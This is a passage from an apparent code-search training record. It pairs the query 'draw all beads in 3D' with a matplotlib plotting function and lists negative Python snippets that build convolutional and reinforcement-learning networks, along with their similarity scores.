F.elu(self.conv3(x)) # bsize x l3_channels x floor(l1_channels/2) x floor(Nsamples/4)\n x = self.batchnorm3(x)\n x = F.dropout(x, 0.25)\n x = self.pooling3(x) # bsize x l3_channels x floor(l1_channels/4) x floor(Nsamples/16)\n\n # Fully-connected Layer\n x = x.view(-1, self.fc1.in_features) # bsize x (l3_channels*floor(l1_channels/4)*floor(Nsamples/16))\n x = F.sigmoid(self.fc1(x)) # bisze x self.fc1.out_features \n \n if self.fc1.out_features == 1:\n x = x.view(-1) # bsize (1D if 1 output unit)\n \n return x", "def initialize_network(self):\n # intermediate layer size\n ils = int((self.specbinnum + self.numfilters) / 2)\n\n network = lasagne.layers.InputLayer((None, 1, self.specbinnum, self.numtimebins), self.input_var)\n\n network = NormalisationLayer(network, self.specbinnum)\n self.normlayer = network\n\n network, _ = custom_convlayer_2(network, in_num_chans=self.specbinnum, out_num_chans=ils)\n network = batch_norm(network)\n network, _ = custom_convlayer_2(network, in_num_chans=ils, out_num_chans=self.numfilters)\n network = batch_norm(network)\n\n network = lasagne.layers.NonlinearityLayer(network, nonlinearity=elu)\n self.latents = network\n network = ZeroOutBackgroundLatentsLayer(self.latents,\n mp_down_factor=self.mp_down_factor,\n numfilters=self.numfilters,\n numtimebins=self.numtimebins,\n background_latents_factor=self.background_latents_factor,\n use_maxpool=self.use_maxpool)\n network, _ = custom_convlayer_2(network, in_num_chans=self.numfilters, out_num_chans=ils)\n network = batch_norm(network)\n network, _ = custom_convlayer_2(network, in_num_chans=ils, out_num_chans=self.specbinnum)\n network = batch_norm(network)\n\n # output_size\n num_time_samples = int(audioframe_len/2 * (self.numtimebins + 1))\n # network = batch_norm(DenseLayer(network, num_time_samples)) # MemoryError\n network, _ = custom_convlayer_2(network, in_num_chans=self.specbinnum, out_num_chans=num_time_samples)\n network, _ = batch_norm(network)\n network, _ = custom_convlayer_2(network, in_num_chans=num_time_samples, out_num_chans=1)\n network, _ = batch_norm(network)\n\n self.network = network", "def build_dc_classifier():\n # return nn.Sequential(\n # Unflatten(Batch_size, 1, 28, 28),\n # nn.Conv2d(1, 32, kernel_size=5, stride=1),\n # nn.LeakyReLU(negative_slope=0.01),\n # nn.MaxPool2d(2, stride=2),\n # nn.Conv2d(32, 64, kernel_size=5, stride=1),\n # nn.LeakyReLU(negative_slope=0.01),\n # nn.MaxPool2d(kernel_size=2, stride=2),\n # Flatten(),\n # nn.Linear(4 * 4 * 64, 4 * 4 * 64),\n # nn.LeakyReLU(negative_slope=0.01),\n # nn.Linear(4 * 4 * 64, 1)\n # )\n\n return nn.Sequential(\n Unflatten(Batch_size, 1, 128, 128), #28,28,32 #128,128,16\n nn.Conv2d(1, 16,kernel_size=5, stride=1), #24,24,32 #124,124,16\n nn.LeakyReLU(negative_slope=0.01),\n nn.MaxPool2d(2, stride=2), #12,12,32 #62,62,16\n nn.Conv2d(16, 32,kernel_size=5, stride=1), # 8, 8,64 #58,58,32\n nn.LeakyReLU(negative_slope=0.01),\n nn.MaxPool2d(kernel_size=2, stride=2), # 4, 4,64 #29,29,32\n nn.Conv2d(32, 64, kernel_size=5, stride=1), #25,25,64\n nn.LeakyReLU(negative_slope=0.01),\n nn.MaxPool2d(kernel_size=2, stride=2), #12,12,64\n nn.Conv2d(64, 128, kernel_size=5, stride=1), # 8, 8,128\n nn.LeakyReLU(negative_slope=0.01),\n nn.MaxPool2d(kernel_size=2, stride=2), # 4, 4,128\n Flatten(),\n nn.Linear(4*4*128, 4*4*128), # 4*4*64 # 4*4*128\n nn.LeakyReLU(negative_slope=0.01),\n nn.Linear(4*4*128,1) # 4*4*64 # 4*4*128\n )", "def _build_network(self):\n self.new_trainable_variable(\"w0_sin\", np.zeros(\n (config.somites * 2 - 2, HIDDEN_LAYER_UNITS), dtype=np.float64))\n self.new_trainable_variable(\"b0_sin\", np.zeros(HIDDEN_LAYER_UNITS, dtype=np.float64))\n self.new_trainable_variable(\"w1_sin\", np.zeros(\n (HIDDEN_LAYER_UNITS, config.oscillators), dtype=np.float64))\n self.new_trainable_variable(\"b1_sin\", np.zeros(config.oscillators, dtype=np.float64))\n\n self.new_trainable_variable(\"w0_cos\", np.zeros(\n (config.somites * 2 - 2, HIDDEN_LAYER_UNITS), dtype=np.float64))\n self.new_trainable_variable(\"b0_cos\", np.zeros(HIDDEN_LAYER_UNITS, dtype=np.float64))\n self.new_trainable_variable(\"w1_cos\", np.zeros(\n (HIDDEN_LAYER_UNITS, config.oscillators), dtype=np.float64))\n self.new_trainable_variable(\"b1_cos\", np.zeros(config.oscillators, dtype=np.float64))\n\n def action_infer(state: np.array) -> np.array:\n \"\"\"\n Get state and return feedback.\n\n state: [f_0, f_1, ..., phi_0, phi_1, ..., t_0, t_1, ...]\n return: [phase_feedback0, phase_feedback1, ..., angle_range0, angle_range1, ...]\n\n Discrepancy for torsion spring = alpha / 2 * k * range * T * sin(phi_i)\n \"\"\"\n forces = state[:config.somites]\n phis = state[config.somites:config.somites + config.oscillators]\n tensions = state[config.somites + config.oscillators:]\n\n f_sin, f_cos = self._calc_fs(np.concatenate((forces, tensions)))\n discrepancies = -0.5 * config.caterpillar_params[\"vertical_ts_k\"] * config.caterpillar_params[\"realtime_tunable_ts_rom\"] * tensions * np.sin(phis)\n return f_sin * np.sin(phis) + f_cos * np.cos(phis) - self.get_discrep_coeffs() * discrepancies, np.ones(config.oscillators) * config.caterpillar_params[\"realtime_tunable_ts_rom\"]\n\n return action_infer", "def __init__(self):\n\n super(GlobalDiscriminator, self).__init__()\n\n # input image will have the size of 64x64x3\n self.first_conv_layer = TransitionDown(in_channels=3, out_channels=32, kernel_size=5)\n self.second_conv_layer = TransitionDown(in_channels=32, out_channels=32, kernel_size=5)\n self.third_conv_layer = TransitionDown(in_channels=32, out_channels=64, kernel_size=5)\n self.fourth_conv_layer = TransitionDown(in_channels=64, out_channels=64, kernel_size=5)\n\n self.fc1 = nn.Linear(5 * 5 * 64, 1)\n\n torch.nn.init.xavier_uniform(self.fc1.weight)", "def _build_networks(self):\n self.online_convnet = self._create_network(name='Online')\n self.target_convnet = self._create_network(name='Target')\n self._net_outputs = self.online_convnet(self.state_ph, training=True)\n self._q_argmax = tf.argmax(self._net_outputs.q_values, axis=1)[0]\n self._replay_net_outputs = self.online_convnet(self._replay.states,\n training=True)\n self._replay_next_target_net_outputs = self.target_convnet(\n self._replay.next_states)", "def get_network(x):\n n_classes = 5\n batch_size = x.get_shape().as_list()[0]\n channels = x.get_shape().as_list()[3]\n \n # split channels to process separately\n c1, c2, c3, c4 = tf.split(3, channels, x)\n \n # Model Helpers --------------------------------------------------------\n\n # https://www.tensorflow.org/versions/r0.8/api_docs/python/nn.html#conv2d\n def conv2d(img, w, b):\n \n x = tf.nn.conv2d(img, w, strides=[1, 1, 1, 1], padding='VALID')\n z = tf.nn.bias_add(x, b)\n return tf.nn.relu(z)\n\n # https://www.tensorflow.org/versions/r0.8/api_docs/python/nn.html#max_pool\n def max_pool(img, k):\n ks = [1, k, k, 1]\n return tf.nn.max_pool(img, ksize=ks, strides=ks, padding='VALID')\n\n # TODO implement\n def maxout(x):\n raise NotImplemented()\n\n def fc(x, w, b, act):\n return act(tf.add(tf.matmul(x, w), b))\n\n def conv_net(_x):\n # First convolution layer\n #print 'x: {}'.format(_X.get_shape())\n weights = {\n # 6x6 conv, 3-channel input, 32-channel outputs\n 'wc1': tf.Variable(tf.truncated_normal([10, 10, 1, 32], stddev=0.01)),\n # 5x5 conv, 32-channel inputs, 64-channel outputs\n 'wc2': tf.Variable(tf.truncated_normal([7, 7, 32, 64], stddev=0.01)),\n # 3x3 conv, 64-channel inputs, 128-channel outputs\n 'wc3': tf.Variable(tf.truncated_normal([3, 3, 64, 128], stddev=0.01)),\n # 3x3 conv, 128-channel inputs, 128-channel outputs\n 'wc4': tf.Variable(tf.truncated_normal([3, 3, 128, 128], stddev=0.1)),\n }\n \n biases = {\n 'bc1': tf.Variable(tf.constant(0.1, shape=[32])),\n 'bc2': tf.Variable(tf.constant(0.1, shape=[64])),\n 'bc3': tf.Variable(tf.constant(0.1, shape=[128])),\n 'bc4': tf.Variable(tf.constant(0.1, shape=[128])),\n } \n \n \n conv1 = conv2d(_x, weights['wc1'], biases['bc1'])\n # k used to be 2\n conv1 = max_pool(conv1, k=4)\n\n #print 'conv1: {}'.format(conv1.get_shape())\n\n # Second Covolution layer\n conv2 = conv2d(conv1, weights['wc2'], biases['bc2'])\n conv2 = max_pool(conv2, k=2)\n\n # Thrid Convolution Layer\n conv3 = conv2d(conv2, weights['wc3'], biases['bc3'])\n\n #print 'conv3: {}'.format(conv3.get_shape())\n\n # Fourth Convolution Layer\n conv4 = conv2d(conv3, weights['wc4'], biases['bc4'])\n conv4 = max_pool(conv4, k=2)\n\n return tf.reshape(conv4, [batch_size, -1])\n\n \n fc_weights = {\n 'wf1': tf.Variable(tf.truncated_normal([512, 2048], stddev=0.001)),\n # fully coneected 2048 inputs, 2048 outputs\n 'wf2': tf.Variable(tf.truncated_normal([2048, 2048], stddev=0.001)),\n # 2048 inputs, 5 outputs (class prediction)\n 'out': tf.Variable(tf.truncated_normal([2048, n_classes], stddev=0.01))\n }\n \n fc_biases = {\n 'bf1': tf.Variable(tf.constant(0.01, shape=[2048])),\n 'bf2': tf.Variable(tf.constant(0.01, shape=[2048])),\n 'out': tf.Variable(tf.constant(0.1, shape=[n_classes]))\n }\n\n c1 = conv_net(c1)\n c2 = conv_net(c2)\n c3 = conv_net(c3)\n c4 = conv_net(c4)\n \n # feed this into one fully connected layer\n cmb = tf.concat(1, [c1,c2,c3,c4]) \n \n # fully connected\n fc1 = fc(cmb, fc_weights['wf1'], fc_biases['bf1'], tf.nn.relu)\n fc2 = fc(fc1, fc_weights['wf2'], fc_biases['bf2'], tf.nn.relu)\n \n # output\n output = fc(fc2, fc_weights['out'], fc_biases['out'], tf.nn.softmax)\n \n return output", "def _build_networks(self):\n # Calling online_convnet will generate a new graph as defined in\n # self._get_network_template using whatever input is passed, but will always\n # share the same weights.\n self.online_convnet = tf.make_template('Online', self._network_template)\n self.target_convnet = tf.make_template('Target', self._network_template)\n self._net_outputs = self.online_convnet(self.state_ph)\n\n self._replay_net_outputs = self.online_convnet(self._replay.states)\n self._replay_next_target_net_outputs = self.target_convnet(\n self._replay.next_states)\n\n if self.acting_policy == 'hyperbolic':\n self._q_argmax = tf.argmax(self._net_outputs.hyp_q_value, axis=1)[0]\n elif self.acting_policy == 'largest_gamma':\n self._q_argmax = tf.argmax(self._net_outputs.q_values[-1], axis=1)[0]\n else:\n raise NotImplementedError", "def __init__(self, in_channels=3, n_classes=21):\n super(SegNet_1, self).__init__()\n\n self.layer_1 = SegnetLayer_Encoder(in_channels, 64, 2)\n self.layer_2 = SegnetLayer_Encoder(64, 128, 2)\n self.layer_3 = SegnetLayer_Encoder(128, 256, 3)\n self.layer_4 = SegnetLayer_Encoder(256, 512, 3)\n self.layer_5 = SegnetLayer_Encoder(512, 1024, 3)\n self.layer_6 = SegnetLayer_Encoder(1024, 1024, 3)\n\n self.layer_7 = SegnetLayer_Decoder(1024, 1024, 3)\n self.layer_8 = SegnetLayer_Decoder(1024, 512, 3)\n self.layer_9 = SegnetLayer_Decoder(512, 256, 3)\n self.layer_10 = SegnetLayer_Decoder(256, 128, 3)\n self.layer_11 = SegnetLayer_Decoder(128, 64, 2)\n self.layer_12 = SegnetLayer_Decoder(64, n_classes, 2)", "def __init__(self, n_latent_features=1024, reduced_size=64, activation=ReLU()):\n\n super().__init__()\n self.logger = logging.getLogger(AutoEncoderConvolutional.__name__)\n self.n_latent_features = n_latent_features\n self.reduced_size = reduced_size\n self.middle_layer_size = int(16 * self.reduced_size / 4 * self.reduced_size / 4)\n self.activation = activation\n\n self.logger.info(\"Construct model..\")\n self.encode_conv1 = nn.Conv2d(3, 6, kernel_size=3, padding=1)\n self.encode_pool1 = nn.MaxPool2d(2, stride=2)\n self.encode_conv2 = nn.Conv2d(6, 16, kernel_size=3, padding=1)\n self.encode_pool2 = nn.MaxPool2d(2, stride=2)\n self.encode_fc = nn.Linear(self.middle_layer_size, self.n_latent_features)\n\n self.decode_fc = nn.Linear(self.n_latent_features, self.middle_layer_size)\n self.decode_conv1 = nn.ConvTranspose2d(16, 6, kernel_size=2, stride=2)\n self.decode_conv2 = nn.ConvTranspose2d(6, 3, kernel_size=2, stride=2)\n\n self.reset_weights()\n\n self.logger.info(\"Finished instantiation\")", "def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d):\n super(NLayerDiscriminator, self).__init__()\n use_bias = True\n\n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n self.model = nn.Sequential(*sequence)", "def __init__(self, input_dim=(3, 32, 32), num_filters=32, filter_size=7,\n hidden_dim=100, num_classes=10, weight_scale=1e-3, reg=0.0,\n dtype=np.float32):\n self.params = {}\n self.reg = reg\n self.dtype = dtype\n \n ############################################################################\n # TODO: Initialize weights and biases for the three-layer convolutional #\n # network. Weights should be initialized from a Gaussian with standard #\n # deviation equal to weight_scale; biases should be initialized to zero. #\n # All weights and biases should be stored in the dictionary self.params. #\n ############################################################################\n \n # Store weights and biases for the convolutional layer using the keys 'W1' and 'b1'; \n C, H, W = input_dim\n filter_sizes = (filter_size, filter_size)\n self.params['W1'] = np.random.normal(0, weight_scale, [num_filters, C, filter_sizes[0], filter_sizes[1]])\n self.params['b1'] = np.zeros((num_filters, ))\n\n # use keys 'W2' and 'b2' for the weights and biases of the hidden affine layer;\n # In this case, ConvLayer doesn't reduce the spatial size of the input, (N, C, H, W) -> Conv -> (N, F, H, W)\n # To satisfy this constraint, (W + 2 * pad - filter_size) / stride + 1 = W need to hold, which led to pad = (F - S) / 2 where S == 1\n # (N, C, H, W) -> Conv -> (N, F, H, W) -> Pooling -> (N, F, H/2, W/2)\n # In a FC_NN, FCL weights (input_dim, hidden_dim) where every img is flatten into a 1D array of length D = F * H/2 * W/2.\n self.params['W2'] = np.random.normal(0, weight_scale, [num_filters * (H / 2) * (W / 2), hidden_dim])\n self.params['b2'] = np.zeros((hidden_dim, ))\n\n # And the keys 'W3' and 'b3' for the weights and biases of the output affine layer. \n self.params['W3'] = np.random.normal(0, weight_scale, [hidden_dim, num_classes])\n self.params['b3'] = np.zeros((num_classes, ))\n\n \n ############################################################################\n # END OF YOUR CODE #\n ############################################################################\n\n for k, v in self.params.iteritems():\n self.params[k] = v.astype(dtype)", "def build_neuron_network(nb_features_map: Union[Sequence[int], None] = None,\n size_linear_layers: Union[Sequence[int], None] = None,\n dropout_rate: Union[Tuple[float, float], float] = 0.3,\n conv_kernel_size: Union[Sequence[int], int] = 3,\n conv_stride: int = 1,\n conv_padding: int = 1,\n conv_activation: str = \"relu\",\n conv_architecture: str = \"CPD\",\n pool_kernel_size: int = 2,\n pool_stride: int = 2,\n dense_activation: str = \"relu\",\n pretrained: Union[str, None] = None,\n grayscale: bool = True,\n optimizer: str = \"Adam\",\n weight_decay: float = 0.,\n learning_rate: float = 0.001,\n ) -> Tuple[nn.Module, List, torch.optim.Optimizer]:\n # Initializations\n if pretrained is not None:\n grayscale = False\n if grayscale:\n channels = 1\n else:\n channels = 3\n if nb_features_map is None:\n nb_features_map = [8]\n if size_linear_layers is None:\n size_linear_layers = []\n height = 224\n width = 224\n module = nn.Module()\n shapes = [(\"input\", channels, height, width)]\n layers = {\"extractor\": [], \"regressor\": []}\n if not hasattr(dropout_rate, \"__len__\"):\n dropout_rate = (dropout_rate, 0.)\n next_dropout_rate = dropout_rate[0]\n # If a pretrained model is used:\n if pretrained is None:\n # Input checks\n if hasattr(conv_kernel_size, \"__len__\"):\n if len(conv_kernel_size) != len(nb_features_map):\n raise ValueError(\"The length of nb_features_map shall match the length of conv_kernel_size\")\n else:\n conv_kernel_size = [conv_kernel_size] * len(nb_features_map)\n # Feature extractor\n next_layer_type = itertools.cycle(conv_architecture)\n nb_feature_map = None\n i = 0\n while True:\n layer_type = next(next_layer_type)\n if layer_type == \"C\":\n # Convolutional layer\n try:\n nb_feature_map = nb_features_map[i]\n except IndexError:\n break\n name = \"conv2d-{:02d}\".format(i+1)\n conv = nn.Conv2d(shapes[-1][1], nb_feature_map, conv_kernel_size[i], stride=conv_stride,\n padding=conv_padding)\n layers[\"extractor\"].append((name, conv))\n h, w = output_shape_conv_and_pool_layer(rows=shapes[-1][2], columns=shapes[-1][3],\n kernel=conv_kernel_size[i], stride=conv_stride,\n padding=conv_padding)\n shapes.append((name, nb_feature_map, h, w))\n i += 1\n # Activation\n if conv_activation == \"relu\":\n activ = nn.ReLU()\n elif conv_activation == \"elu\":\n activ = nn.ELU(alpha=0.1)\n elif conv_activation == \"leaky\":\n activ = nn.LeakyReLU()\n else:\n activ = nn.ReLU()\n name = \"{}-{:02d}\".format(conv_activation, i)\n layers[\"extractor\"].append((name, activ))\n # activation does not change the size\n shapes.append((name, shapes[-1][1], shapes[-1][2], shapes[-1][3]))\n elif layer_type == \"P\":\n # Max-pooling\n name = \"maxpool2d-{:02d}\".format(i)\n pool = nn.MaxPool2d(pool_kernel_size, pool_stride)\n layers[\"extractor\"].append((name, pool))\n h, w = output_shape_conv_and_pool_layer(rows=shapes[-1][2], columns=shapes[-1][3],\n kernel=pool_kernel_size, stride=pool_stride)\n shapes.append((name, nb_feature_map, h, w))\n elif layer_type == \"D\":\n # Dropout\n if next_dropout_rate > 0.:\n name = \"dropout-{:02d}\".format(i)\n dropout = nn.Dropout(p=next_dropout_rate)\n layers[\"extractor\"].append((name, dropout))\n # Dropout does not change the size\n shapes.append((name, shapes[-1][1], shapes[-1][2], shapes[-1][3]))\n next_dropout_rate += dropout_rate[1]\n elif layer_type == \"B\":\n # Batch normalization\n name = \"batchnorm-{:02d}\".format(i)\n batch = nn.BatchNorm2d(shapes[-1][1])\n layers[\"extractor\"].append((name, batch))\n # Batch norm. does not change the size\n shapes.append((name, shapes[-1][1], shapes[-1][2], shapes[-1][3]))\n # Add a flatten layer\n name = \"flatten\"\n flatten = nn.Flatten(1)\n layers[\"extractor\"].append((name, flatten))\n shapes.append((name, shapes[-1][1] * shapes[-1][2] * shapes[-1][3]))\n # Create extractor module\n extractor = nn.Sequential(OrderedDict(layers[\"extractor\"]))\n module.add_module(\"extractor\", extractor)\n elif pretrained == \"VGG16\":\n pre_trained = models.vgg16(pretrained=True)\n modules = []\n for _name, _module in pre_trained.named_children():\n if _name != 'classifier':\n modules.append((_name, _module))\n modules.append((\"flatten\", nn.Flatten(1)))\n vgg16 = nn.Sequential(OrderedDict(modules))\n # Freeze all parameters in the pre-trained model\n # So we prevent gradients from being calculated, it will save computation time\n for param in vgg16.parameters():\n param.requires_grad = False\n module.add_module('extractor', vgg16)\n shapes.append((pretrained, 25088))\n else:\n raise ValueError(f\"Unknown pre-trained model '{pretrained}'.\")\n # Regressor\n for i, size_linear_layer in enumerate(size_linear_layers):\n # Add a linear layer\n name = \"linear-{:02d}\".format(i + 1)\n linear = nn.Linear(shapes[-1][1], size_linear_layer)\n layers[\"regressor\"].append((name, linear))\n shapes.append((name, size_linear_layer))\n # Activation\n if dense_activation == \"relu\":\n activ = nn.ReLU()\n elif dense_activation == \"elu\":\n activ = nn.ELU(alpha=0.1)\n elif dense_activation == \"leaky\":\n activ = nn.LeakyReLU()\n else:\n activ = nn.ReLU()\n name = \"{}-{:02d}\".format(dense_activation, i + 1)\n layers[\"regressor\"].append((name, activ))\n shapes.append((name, shapes[-1][1])) # activation does not change the size\n # Dropout\n if next_dropout_rate > 0.:\n name = \"dropout-{:02d}\".format(i + 1)\n dropout = nn.Dropout(p=next_dropout_rate)\n layers[\"regressor\"].append((name, dropout))\n shapes.append((name, shapes[-1][1])) # Dropout does not change the size of array\n next_dropout_rate += dropout_rate[1]\n # Add the final layer, the output size is fixed to 68 x 2 = 136\n name = \"output\"\n linear = nn.Linear(shapes[-1][1], 136)\n layers[\"regressor\"].append((name, linear))\n shapes.append((name, 136))\n # Create regressor module\n regressor = nn.Sequential(OrderedDict(layers[\"regressor\"]))\n module.add_module(\"regressor\", regressor)\n # Weight initialization\n module.apply(weight_initialization)\n # Optimizer\n if optimizer == \"Adam\":\n optim = torch.optim.Adam(module.parameters(), lr=learning_rate, weight_decay=weight_decay)\n elif optimizer == \"AdamW\":\n optim = torch.optim.AdamW(module.parameters(), lr=learning_rate, weight_decay=weight_decay)\n elif optimizer == \"SGD\":\n optim = torch.optim.SGD(module.parameters(), lr=learning_rate, weight_decay=weight_decay, momentum=0.9)\n else:\n raise ValueError(f\"Unknown optimizer {optimizer}.\")\n return module, shapes, optim", "def _build_networks(self):\n self.online_convnet = self._create_network(name='Online')\n self.target_convnet = self._create_network(name='Target')\n\n # Compute the Q-values which are used for action selection in the current\n # state.\n self._net_outputs = self.online_convnet(self.state_ph,\n self.num_quantile_samples)\n # Shape of self._net_outputs.quantile_values:\n # num_quantile_samples x num_actions.\n # e.g. if num_actions is 2, it might look something like this:\n # Vals for Quantile .2 Vals for Quantile .4 Vals for Quantile .6\n # [[0.1, 0.5], [0.15, -0.3], [0.15, -0.2]]\n # Q-values = [(0.1 + 0.15 + 0.15)/3, (0.5 + 0.15 + -0.2)/3].\n self._q_values = tf.reduce_mean(self._net_outputs.quantile_values, axis=0)\n self._q_argmax = tf.argmax(self._q_values, axis=0)\n self._policy_logits = tf.nn.softmax(self._q_values / self.tau, axis=0)\n self._stochastic_action = tf.random.categorical(\n self._policy_logits[None, Ellipsis],\n num_samples=1,\n dtype=tf.int32)[0][0]\n\n self._replay_net_outputs = self.online_convnet(self._replay.states,\n self.num_tau_samples)\n # Shape: (num_tau_samples x batch_size) x num_actions.\n self._replay_net_quantile_values = self._replay_net_outputs.quantile_values\n self._replay_net_quantiles = self._replay_net_outputs.quantiles\n\n # Do the same for next states in the replay buffer.\n self._replay_net_target_outputs = self.target_convnet(\n self._replay.next_states, self.num_tau_prime_samples)\n # Shape: (num_tau_prime_samples x batch_size) x num_actions.\n vals = self._replay_net_target_outputs.quantile_values\n self._replay_net_target_quantile_values = vals\n\n # Compute Q-values which are used for action selection for the states and\n # next states in the replay buffer.\n target_next_action = self.target_convnet(self._replay.next_states,\n self.num_quantile_samples)\n target_action = self.target_convnet(self._replay.states,\n self.num_quantile_samples)\n\n # Shape: (num_quantile_samples x batch_size) x num_actions.\n target_next_quantile_values_action = target_next_action.quantile_values\n # Shape: num_quantile_samples x batch_size x num_actions.\n target_next_quantile_values_action = tf.reshape(\n target_next_quantile_values_action,\n [self.num_quantile_samples, self._replay.batch_size, self.num_actions])\n\n # Shape: (num_quantile_samples x batch_size) x num_actions.\n target_quantile_values_action = target_action.quantile_values\n # Shape: num_quantile_samples x batch_size x num_actions.\n target_quantile_values_action = tf.reshape(target_quantile_values_action,\n [self.num_quantile_samples,\n self._replay.batch_size,\n self.num_actions])\n # Shape: batch_size x num_actions.\n self._replay_next_target_q_values = tf.squeeze(tf.reduce_mean(\n target_next_quantile_values_action, axis=0))\n self._replay_target_q_values = tf.squeeze(tf.reduce_mean(\n target_quantile_values_action, axis=0))\n\n self._replay_next_qt_argmax = tf.argmax(\n self._replay_next_target_q_values, axis=1)", "def build_resnet152(self):\n use_batch_norm = self.use_batch_norm\n\n imgs = tf.placeholder(tf.float32, [self.batch_size]+self.img_shape)\n is_train = tf.placeholder(tf.bool)\n\n conv1_feats = convolution(imgs, 7, 7, 64, 2, 2, 'conv1')\n conv1_feats = batch_norm(conv1_feats, 'bn_conv1', is_train, use_batch_norm)\n conv1_feats = nonlinear(conv1_feats, 'relu')\n pool1_feats = max_pool(conv1_feats, 3, 3, 2, 2, 'pool1')\n\n res2a_feats = self.basic_block(pool1_feats, 'res2a', 'bn2a', is_train, use_batch_norm, 64, 1)\n res2b_feats = self.basic_block2(res2a_feats, 'res2b', 'bn2b', is_train, use_batch_norm, 64)\n res2c_feats = self.basic_block2(res2b_feats, 'res2c', 'bn2c', is_train, use_batch_norm, 64)\n \n res3a_feats = self.basic_block(res2c_feats, 'res3a', 'bn3a', is_train, use_batch_norm, 128) \n temp = res3a_feats\n for i in range(1, 8):\n temp = self.basic_block2(temp, 'res3b'+str(i), 'bn3b'+str(i), is_train, use_batch_norm, 128)\n res3b7_feats = temp\n \n res4a_feats = self.basic_block(res3b7_feats, 'res4a', 'bn4a', is_train, use_batch_norm, 256)\n temp = res4a_feats\n for i in range(1, 36):\n temp = self.basic_block2(temp, 'res4b'+str(i), 'bn4b'+str(i), is_train, use_batch_norm, 256)\n res4b35_feats = temp\n\n res5a_feats = self.basic_block(res4b35_feats, 'res5a', 'bn5a', is_train, use_batch_norm, 512)\n res5b_feats = self.basic_block2(res5a_feats, 'res5b', 'bn5b', is_train, use_batch_norm, 512)\n res5c_feats = self.basic_block2(res5b_feats, 'res5c', 'bn5c', is_train, use_batch_norm, 512)\n\n res5c_feats_flat = tf.reshape(res5c_feats, [self.batch_size, 49, 2048])\n self.conv_feats = res5c_feats_flat\n self.conv_feat_shape = [49, 2048]\n self.num_ctx = 49 \n self.dim_ctx = 2048\n\n self.imgs = imgs\n self.is_train = is_train", "def __call__(self, x, is_training, nfilt=32, reuse=False):\n with tf.variable_scope(self.name):\n x = tf.reshape(x, [-1, self.input_dim, self.input_dim, self.channels])\n\n # attnh1 = unet_conv(x, nfilt*1, 'attnh1', reuse, is_training, use_batch_norm=False)\n # attn1 = unet_conv_t(attnh1, None, 1, 'attn1', reuse, is_training, activation=tf.nn.tanh)\n\n # attnh2 = unet_conv(attnh1, nfilt*2, 'attnh2', reuse, is_training)\n # attn2 = unet_conv_t(attnh2, None, nfilt*2, 'attn2_1', reuse, is_training)\n # attn2 = unet_conv_t(attn2, None, 1, 'attn2_2', reuse, is_training, activation=tf.nn.tanh)\n\n # attnh3 = unet_conv(attnh2, nfilt*4, 'attnh3', reuse, is_training)\n # attn3 = unet_conv_t(attnh3, None, nfilt*4, 'attn3_1', reuse, is_training)\n # attn3 = unet_conv_t(attn3, None, nfilt*2, 'attn3_2', reuse, is_training)\n # attn3 = unet_conv_t(attn3, None, 1, 'attn3_3', reuse, is_training, activation=tf.nn.tanh)\n\n # salience = tf.concat([attn1, attn2, attn3], 3)\n # salience = conv(salience, 1, 'salience', s=1, reuse=reuse)\n # salience = tf.reshape(salience, (-1, self.input_dim*self.input_dim*1))\n # salience = tf.nn.softmax(salience)\n # salience = tf.reshape(salience, (-1, self.input_dim,self.input_dim,1))\n\n h1 = unet_conv(x, nfilt*1, 'h1', reuse, is_training, use_batch_norm=False)\n h2 = unet_conv(h1, nfilt*2, 'h2', reuse, is_training)\n h3 = unet_conv(h2, nfilt*4, 'h3', reuse, is_training)\n out = unet_conv(h3, 1, 'out', reuse, is_training, use_batch_norm=False, activation=None)\n\n return out" ]
[ "0.68114513", "0.6745461", "0.67398894", "0.67094636", "0.6685526", "0.6679833", "0.66453695", "0.6631616", "0.65937024", "0.65893584", "0.65746665", "0.6562869", "0.6550034", "0.6546586", "0.65442574", "0.6542558", "0.65119946", "0.64806116", "0.64779437", "0.64562774", "0.6443894", "0.6441079", "0.6440008", "0.6426602", "0.6425736", "0.6424125", "0.6416772", "0.6413305", "0.63934016", "0.6384428", "0.63402045", "0.63346297", "0.6332372", "0.63187844", "0.6313421", "0.6307618", "0.63074756", "0.630579", "0.63022643", "0.63011134", "0.62942654", "0.62829876", "0.62749976", "0.6249788", "0.623691", "0.62365603", "0.62336725", "0.6229006", "0.62257534", "0.6218384", "0.6214259", "0.6211024", "0.621091", "0.62016094", "0.6198679", "0.6193147", "0.61841184", "0.6183229", "0.6179281", "0.6177996", "0.6173619", "0.61689395", "0.61672324", "0.61610174", "0.61585397", "0.61572045", "0.61458635", "0.6144231", "0.6135203", "0.61314416", "0.612922", "0.61262155", "0.6124517", "0.61212504", "0.6119152", "0.6114462", "0.6109514", "0.61090887", "0.61090887", "0.610567", "0.610391", "0.61037153", "0.6103452", "0.61021143", "0.60964024", "0.60903925", "0.6090173", "0.6086748", "0.6083789", "0.6083452", "0.60790884", "0.60691595", "0.60658145", "0.60587966", "0.60579634", "0.6055592", "0.60536504", "0.6052069", "0.6052007", "0.6048691", "0.60475904" ]
0.0
-1
draw all beads in 3D
def draw_beads_3d(ax,beads): nslice,nptcl,ndim = beads.shape com = beads.mean(axis=0) # center of mass of each particle, used to label the particles only ptcls = [] for iptcl in range(nptcl): mypos = beads[:,iptcl,:] # all time slices for particle iptcl pos = np.insert(mypos,0,mypos[-1],axis=0) # close beads line = ax.plot(pos[:,0],pos[:,1],pos[:,2],marker='o') # draw particle text = ax.text(com[iptcl,0],com[iptcl,1],com[iptcl,2],'ptcl %d' % iptcl,fontsize=20) # label particle ptcls.append( (line,text) ) return ptcls
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
